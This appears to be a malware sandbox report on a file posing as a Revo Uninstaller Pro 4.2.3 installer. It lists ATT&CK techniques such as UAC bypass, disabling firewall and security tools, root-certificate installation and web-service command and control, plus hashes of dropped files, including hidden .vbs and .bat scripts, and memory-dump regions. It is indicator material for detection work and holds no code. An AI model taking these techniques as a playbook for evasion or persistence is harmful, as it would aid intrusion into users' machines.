T1546.007

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

BITS Jobs

T1197

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf

Filesize
2KB

MD5
edc78deb34de240c787b1011161e9a4e

SHA1
2d31275530dce33d3bc329991c8ad59e1b303577

SHA256
69569b4b111035cd35186da239d8241cf96350f6bb296210368ebc570fa2162b

SHA512
e55eefcc39b7353ef11a778910400c5c85cab9657bb350840988cbbf556dc343a9c1803442643c9255c149f8d93a5c2d2e6c3bea244f67c895e635eaec0a0f7b

Download Submit
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe

Filesize
9.6MB

MD5
1dd8459f2595e4c0603ad491590f6952

SHA1
607efe3c74388fb1e4b19f8f7ed2520ebfc349a1

SHA256
5bd688f49ff03dd91e3e88fc6c66d495f72afa617c4363b69c29c4ca5016fc4d

SHA512
c89c0d8457800642b1b165098d9c6def13a6e56d2ad20fb13b4cf2598d278940036d34a3657a1e07cb0028240000ef3c1dcd3b9c4def0fd861aae684db60c22d

Download Submit
C:\ProgramData\uzlyLtM20yixSdV\5jayrzw1q.vbs

Filesize
96KB

MD5
c84933bcccf41369ef9ecce015b86ed0

SHA1
624713276ae217d8d05c03598eecd31209c7f77a

SHA256
ca975635eaa8499a9fbd3873a71d6bd0ef5e253dc4528f4ad39824e31b176679

SHA512
221ecc4d8c1492cc3358f1d9f0017080733ff0b553e31b098968b81827e2f4cfb3f9bdeebdd328dde356397a2a6fc49f1e7495c196bebed6cbb70b0a23b86363

Download Submit
C:\ProgramData\uzlyLtM20yixSdV\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\uzlyLtM20yixSdV\avNIprUwIk.bat

Filesize
22KB

MD5
b0a7842dd51df8942bc8b837282d1c2b

SHA1
0e9432597657c28ca9ac766ac7bf0a903d6aeb3b

SHA256
4a505f646a87f41b4163dc42a8f2ddbd0a64be29392dbf8c8b693cba9c72aaf8

SHA512
b65e7c5a08e1dace4b72861e7ecf95ebc68e9d2d624eac79fca2d1449a51d11271c4c837e72886c29713d320adf1ec3f02f7a89c633978e8dc6acb3fbec6e3a6

Download Submit
C:\ProgramData\uzlyLtM20yixSdV\delXPDUR9c.bat

Filesize
111B

MD5
308ba58a50ffa9eabd31fdba79af6dd1

SHA1
29c09164facb6419f9d7f9e103f7e13bed4743a1

SHA256
0ef02b5ebb5f59c70722fc29651ad48a49b2b4d87f33416b1b06c8a038475243

SHA512
674edfeacf8c6e606a80187f95dc16abcc0804f18c2b2e81734cf4f7e6d1f68e9db5827f18107c0882506aba47485665471c37acd2b9ad50ca075eb083a9582f

Download Submit
C:\ProgramData\uzlyLtM20yixSdV\main.bat

Filesize
386B

MD5
1376349b5831fe5760106870cd5bad6d

SHA1
cf6ff2d17e597893a61fedfd4fe90748ab2349e1

SHA256
67fc2976cfc997cc5d0e74a45ba3fe44c486e3f57e92a9b77cfd4d55199c1872

SHA512
64af4f7e513b6e860757293f0dd92100f17121f10d9c75c72c8ff9bea1144eda55c62be6b16a158b513828cdc3e3c5a355382062d975673617f020a5e10d99b8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
2aa2713f855ff114ac2fdaaf8e7acfe5

SHA1
1da6223cc9d34b572213d4e6ab3990efba5f4b36

SHA256
82585b756e0cf581f621aff8a299afad83d3595eabcadae3b32fdd4e3c125836

SHA512
72b29461c19c01e8a6fd0f8274b965733f94f758fe7907251160353fc4f1694f4ffdc0eb59067cc1791145e448f5f8cfd039f342b752db5d91385f658446f64b

Download Submit
C:\Windows\System32\drivers\revoflt.sys

Filesize
39KB

MD5
498c3d4d44382a96812a0e0ff28d575b

SHA1
c34586b789ca5fe4336ab23ad6ff6eeb991c9612

SHA256
23cb784547268cf775636b07cac4c00b962fd10a7f9144d5d5886a9166919bba

SHA512
ce450128e9ca1675eab8aa734dc907dfc55f3dacd62503339080d6bd47b2523d063786dbe28e6833db041f1d5869670be2411a39c7b8d93d05a98b4c09cad1a1

Download Submit
\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe

Filesize
14.2MB

MD5
dc21d689cfa1860e8820ed0ee45b1f2a

SHA1
acf2db6df76114601a2e58097629e0c8cbce129b

SHA256
01732d1f4d7862d00321ff4972d1d278825958c382c77fec6cdd9ced28a28d0c

SHA512
a4a87e46fccd0c7c99331fa13271bc663d4e5f5c03423da20474de0c62dc79af7ab9b39ca834b7965eeba2702394bfb0250bff87bce4dadb280ba364a7475140

Download Submit
\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll

Filesize
188KB

MD5
75d7bf3468669a6c3df6f4d048315128

SHA1
678d3b531738573520367b47c0cd52cf5e431fa0

SHA256
927eea7dfec57f598e6f1850aebe3c3bc8061e5690bc84ba3dc03f5b35980bae

SHA512
9c5a170f5654c4e6378092dfbd56e2a41b364dc212429efa388cb8a162bff3fda977bf0328c7515fc4ec7ef1098f65ff5f63106b76d3f36e66ce9801294cde9e

Download Submit
\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe

Filesize
23.7MB

MD5
ddb041550a3e69764cd9d7d3de3636f3

SHA1
1ad9b13a6627c1e6f258951965e39ba9cfd9cb1c

SHA256
54e416d5e3bfdd83cde4c9b42deb8839d1190369c12325aa324bd986210a6975

SHA512
00498cc2563e92d1b294dda04308aa77219d7e0b59c993ed61200d0ed641650f1d941147eb4e973fc92a7946e79c722607ceb3e1da5ce4b9f52ff3ce6cc8d800

Download Submit
\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp

Filesize
982KB

MD5
74f1186a6d3bc01716681712c6b24a74

SHA1
9c015d4a4d4a9c7ee4619ea2e2068143c3b81e18

SHA256
d4c2a4940f43e5bdab3963fb2a357f52ae6866e6dc4426909f828b2228af814d

SHA512
bea8504e1b2244ac425cde33a34d6ac5e6f77d75050c6646d7abebbdaf9d0eab91ca7e4e41abea2aed9c55c445d1c924a62d46a9b08bfe81661982fdf14e20e0

Download Submit
\Users\Admin\AppData\Local\Temp\is-9JN2I.tmp\_isetup\_shfoldr.dll

Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-9JN2I.tmp\b2p.dll

Filesize
22KB

MD5
ab35386487b343e3e82dbd2671ff9dab

SHA1
03591d07aea3309b631a7d3a6e20a92653e199b8

SHA256
c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2

SHA512
b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

Download Submit
\Users\Admin\AppData\Local\Temp\is-9JN2I.tmp\botva2.dll

Filesize
37KB

MD5
67965a5957a61867d661f05ae1f4773e

SHA1
f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

SHA256
450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

SHA512
c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

Download Submit
\Users\Admin\AppData\Local\Temp\is-9JN2I.tmp\iswin7logo.dll

Filesize
39KB

MD5
1ea948aad25ddd347d9b80bef6df9779

SHA1
0be971e67a6c3b1297e572d97c14f74b05dafed3

SHA256
30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488

SHA512
f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545

Download Submit
\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp

Filesize
2.5MB

MD5
d0e24e6d7017127bea02bb0160229bee

SHA1
34350e5b7f268797b2a7ec56390c2228f841b37b

SHA256
ca0a5b43e255d0fa7205be3437ea706eda966dd1839ae01d1de1d3b62f832994

SHA512
f5c2edc35c2e43e199c2d4d1d904d9b06cc238b99a6f691f5a9c820c8ed0db77346158ae41237f0086a5009012202bdab4b533b42223f72837c461a499be5c86

Download Submit
\Users\Admin\AppData\Local\Temp\is-CFOUU.tmp\_isetup\_iscrypt.dll

Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
memory/1876-333-0x0000000000400000-0x0000000000E32000-memory.dmp

Filesize
10.2MB

Download
memory/1924-50-0x0000000000400000-0x00000000004CE000-memory.dmp

Filesize
824KB

Download
memory/1924-2-0x0000000000401000-0x00000000004A9000-memory.dmp

Filesize
672KB

Download
memory/1924-0-0x0000000000400000-0x00000000004CE000-memory.dmp

Filesize
824KB

Download
memory/2228-347-0x00000000004D0000-0x00000000004EA000-memory.dmp

Filesize
104KB

Download
memory/2228-343-0x0000000000130000-0x000000000025E000-memory.dmp

Filesize
1.2MB

Download
memory/2228-369-0x00000000055C0000-0x0000000005658000-memory.dmp

Filesize
608KB

Download
memory/2228-368-0x0000000005970000-0x0000000005A60000-memory.dmp

Filesize
960KB

Download
memory/2336-319-0x00000000746E0000-0x00000000746FB000-memory.dmp

Filesize
108KB

Download
memory/2336-174-0x0000000000400000-0x0000000000509000-memory.dmp

Filesize
1.0MB

Download
memory/2336-137-0x00000000744D0000-0x00000000744E1000-memory.dmp

Filesize
68KB

Download
memory/2336-318-0x0000000000400000-0x0000000000509000-memory.dmp

Filesize
1.0MB

Download
memory/2336-361-0x0000000000400000-0x0000000000509000-memory.dmp

Filesize
1.0MB

Download
memory/2336-138-0x0000000001E00000-0x0000000001E0F000-memory.dmp

Filesize
60KB

Download
memory/2336-81-0x0000000001E00000-0x0000000001E0F000-memory.dmp

Filesize
60KB

Download
memory/2336-62-0x00000000746E0000-0x00000000746FB000-memory.dmp

Filesize
108KB

Download
memory/2336-79-0x00000000744D0000-0x00000000744E1000-memory.dmp

Filesize
68KB

Download
memory/2336-135-0x0000000000400000-0x0000000000509000-memory.dmp

Filesize
1.0MB

Download
memory/2336-136-0x00000000746E0000-0x00000000746FB000-memory.dmp

Filesize
108KB

Download
memory/2712-12-0x0000000000400000-0x0000000000689000-memory.dmp

Filesize
2.5MB

Download
memory/2712-48-0x0000000000400000-0x0000000000689000-memory.dmp

Filesize
2.5MB

Download
memory/2820-363-0x0000000000400000-0x0000000000E32000-memory.dmp

Filesize
10.2MB

Download
memory/2840-362-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/2840-36-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/2840-134-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/2988-381-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/2988-372-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/2988-382-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/2988-380-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2988-378-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/2988-376-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/2988-374-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/2988-370-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download